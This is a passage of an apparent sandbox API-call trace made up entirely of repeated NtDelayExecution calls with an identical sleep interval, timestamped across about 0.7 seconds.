(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.937] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.223] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.240] NtDelayExecution 